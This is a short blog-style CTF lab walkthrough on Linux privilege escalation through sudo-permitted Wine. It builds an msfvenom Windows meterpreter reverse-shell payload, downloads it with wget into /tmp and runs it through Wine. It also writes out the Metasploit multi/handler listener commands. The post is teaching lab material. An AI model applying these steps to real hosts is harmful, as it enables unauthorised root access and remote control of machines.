Wine Privilege Escalation Linux

How to setup wine Privilege Escalation Lab For CTF

What is wine in Linux ?

Linux – Wine In Linux.

Wine enables you to run Windows applications on a box. It’s just a Windows emulator on top of Linux. Wine works on Linux, Unix, and other Linux system hence you can smoothly run Windows applications on these systems.

Linux – Wine Privilege Escalation.

Now first Setup our lab I am using ubuntu server 19.0 I am adding user Rahul sudoers file Rahul is a normal user

Add our normal user in the sudoers file

Wine Privilege Escalation

After adding our user check sudoer file

Wine Privilege Escalation
Linux – Creating Payload.

Now exploit our target msfvenom payload I am creating a simple windows meterpreter shell

Wine Privilege Escalation

After Creating our payload upload the payload target machine Now I am starting our local Python server

Download our payload target machine with wget command /tmp directory

After Download our payload Start our metasploit listener

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <your local host IP > set lport <our payload port> run

execute our payload target machine

Wine Privilege Escalation

I got a reverse connection target machine

Find our Root Flag target machine

gdb debugger privilege escalation here try ctfplay

If you have any kind of problem in this whole process, then you can ask me by commenting.

 Thanks to all of you guys for reading my blog.